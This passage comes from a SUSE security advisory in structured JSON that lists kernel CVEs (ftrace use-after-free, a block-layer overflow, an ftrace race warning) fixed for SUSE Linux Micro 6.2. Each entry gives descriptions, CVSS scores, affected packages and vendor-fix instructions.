"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38645",
"url": "https://www.suse.com/security/cve/CVE-2025-38645"
},
{
"category": "external",
"summary": "SUSE Bug 1248626 for CVE-2025-38645",
"url": "https://bugzilla.suse.com/1248626"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38645"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: avoid possible overflow for chunk_sectors check in blk_stack_limits()\n\nIn blk_stack_limits(), we check that the t-\u003echunk_sectors value is a\nmultiple of the t-\u003ephysical_block_size value.\n\nHowever, by finding the chunk_sectors value in bytes, we may overflow\nthe unsigned int which holds chunk_sectors, so change the check to be\nbased on sectors.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39795",
"url": "https://www.suse.com/security/cve/CVE-2025-39795"
},
{
"category": "external",
"summary": "SUSE Bug 1249609 for CVE-2025-39795",
"url": "https://bugzilla.suse.com/1249609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39795"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
